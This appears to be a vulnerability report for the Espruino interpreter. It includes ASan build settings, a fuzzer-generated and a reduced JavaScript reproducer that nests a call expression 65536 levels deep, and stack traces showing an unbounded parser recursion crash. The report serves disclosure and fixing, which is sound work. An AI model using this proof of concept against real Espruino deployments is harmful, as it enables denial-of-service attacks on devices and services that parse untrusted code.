# Debug build instrumented with AddressSanitizer, so the crash below is reported
# with a symbolised stack trace instead of a bare "Segmentation fault".
#   -g                        debug info for symbolised frames
#   -fsanitize=address        ASan instrumentation (compile + link)
#   -fno-omit-frame-pointer   keep frame pointers so ASan's unwinder can walk the stack
export CCFLAGS='-g -fsanitize=address -fno-omit-frame-pointer'
# Linker must also pull in the ASan runtime.
export LDFLAGS='-fsanitize=address'
# NOTE(review): DEBUG=1 selects the project's debug configuration; its exact
# effect (optimisation level, asserts) is defined by the Makefile -- confirm there.
DEBUG=1 make
Test case
testcase
```javascript
// Unreduced fuzzer-generated reproducer. The loop doubles `n` 16 times, so the
// string handed to `new Function(n)` is 2^16 copies of " ( foo " -- a call
// expression nested 65536 levels deep that is never closed. The ASan trace shows
// the Espruino parser recursing once per nesting level (jspeFunctionCall ->
// jspeFactorFunctionCall -> jspeParseFunctionCallBrackets -> ... ->
// jspeFunctionCall), apparently without a depth limit, until the native stack is
// exhausted; a parser recursion-depth (or stack-headroom) check is the usual
// mitigation for this class of untrusted-source DoS. The trailing assertEq/Date
// calls are fuzzer noise and are not needed to reproduce (see the reduced poc.js).
// Note: this is not valid ECMAScript (`do` without `while`, unbalanced braces),
// so it only parses under Espruino's lenient parser and is a SyntaxError in
// Node or a browser.
var n = " ( foo " ; try { for ( i = 0 ; i < 16 ; i ++ ) { var var0 = " a " ; n += n ; } var r = new Function ( n ) ; do { r ( ) ; try { } catch { } } } ; for ( var r = 0 ; r < 12 ; r ++ ) assertEq ( isNaN ( new Date ( 1000000.0, " " ). getTime ( ) ), isNaN ( new Date ( 1e3 ). getTime ( ) ), isNaN ( new Date ( " 123 " ) ), isNaN ( new Date ( - 1000000.0, " : " ). getTime ( ) ), n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, " done " ) ; } catch ( i ) { }
```
// poc.js
// Reduced reproducer for the parser stack overflow (see ASan trace below).
var n = " ( foo " ;
try {
// Double the payload 16 times: `n` ends up as 2^16 = 65536 copies of " ( foo ",
// i.e. a call expression nested 65536 levels deep that is never closed.
// `i` is an undeclared global and `var0` is unused -- both are fuzzer leftovers.
for ( i = 0 ; i < 16 ; i ++ ) {
var var0 = " a " ;
n += n ;
}
// Hand the string to the parser. Per the ASan trace the parser recurses once per
// nesting level (jspeFunctionCall -> jspeFactorFunctionCall ->
// jspeParseFunctionCallBrackets -> ... -> jspeFunctionCall), apparently with no
// depth limit, so the native stack overflows. NOTE(review): whether the overflow
// happens at this line or when `r()` runs below is not visible from the trace
// (Espruino may parse lazily) -- confirm.
var r = new Function ( n ) ;
// This `do` has no `while` and the enclosing `try` has no `catch`/`finally`:
// the file is not valid ECMAScript and only parses under Espruino's lenient
// parser, so it will not reproduce in Node or a browser.
do { r ( ) ; try { } catch { } }
} ;
Execution steps & Output
$ ./espruino poc.js
____ _
| __|___ ___ ___ _ _|_|___ ___
| __|_ -| . | _| | | | | . |
|____|___| _|_| |___|_|_|_|___|
|_| espruino.com
2v20 (c) 2023 G.Williams
Espruino is Open Source. Our work is supported
only by sales of official boards and donations:
http://espruino.com/Donate
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1963515==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe4d1d0fe5 (pc 0x556139b3d06b bp 0x7ffe4d1d1060 sp 0x7ffe4d1d0fe0 T0)
#0 0x556139b3d06a in jspeFactorFunctionCall src/jsparse.c:1220
#1 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
#2 0x556139b3f8d2 in jspeUnaryExpression src/jsparse.c:1970
#3 0x556139b4019e in jspeBinaryExpression src/jsparse.c:2129
#4 0x556139b4037d in jspeConditionalExpression src/jsparse.c:2165
#5 0x556139b406ea in jspeAssignmentExpression src/jsparse.c:2225
#6 0x556139b3afd2 in jspeParseFunctionCallBrackets src/jsparse.c:512
#7 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#8 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322
#9 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
...
...
#239 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#240 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322
#241 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
#242 0x556139b3f8d2 in jspeUnaryExpression src/jsparse.c:1970
#243 0x556139b4019e in jspeBinaryExpression src/jsparse.c:2129
#244 0x556139b4037d in jspeConditionalExpression src/jsparse.c:2165
#245 0x556139b406ea in jspeAssignmentExpression src/jsparse.c:2225
#246 0x556139b3afd2 in jspeParseFunctionCallBrackets src/jsparse.c:512
#247 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#248 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322
SUMMARY: AddressSanitizer: stack-overflow src/jsparse.c:1220 in jspeFactorFunctionCall
==1963515==ABORTING
When the same test case is executed in release mode (built without the sanitizer flags above), the output is:
Output
____ _
| __|___ ___ ___ _ _|_|___ ___
| __|_ -| . | _| | | | | . |
|____|___| _|_| |___|_|_|_|___|
|_| espruino.com
2v20 (c) 2023 G.Williams
Espruino is Open Source. Our work is supported
only by sales of official boards and donations:
http://espruino.com/Donate
Segmentation fault
Espruino revision
Commit: https://github.com/espruino/Espruino/commit/fcc9ba4f12d79710f93d47ea37987cde0efce410 Version: 2v20
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
Test case
testcase
```javascript
var n = " ( foo " ; try { for ( i = 0 ; i < 16 ; i ++ ) { var var0 = " a " ; n += n ; } var r = new Function ( n ) ; do { r ( ) ; try { } catch { } } } ; for ( var r = 0 ; r < 12 ; r ++ ) assertEq ( isNaN ( new Date ( 1000000.0, " " ). getTime ( ) ), isNaN ( new Date ( 1e3 ). getTime ( ) ), isNaN ( new Date ( " 123 " ) ), isNaN ( new Date ( - 1000000.0, " : " ). getTime ( ) ), n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, " done " ) ; } catch ( i ) { }
```
Execution steps & Output
when executed in release mode
Output
Credits: @Ye0nny, @EJueon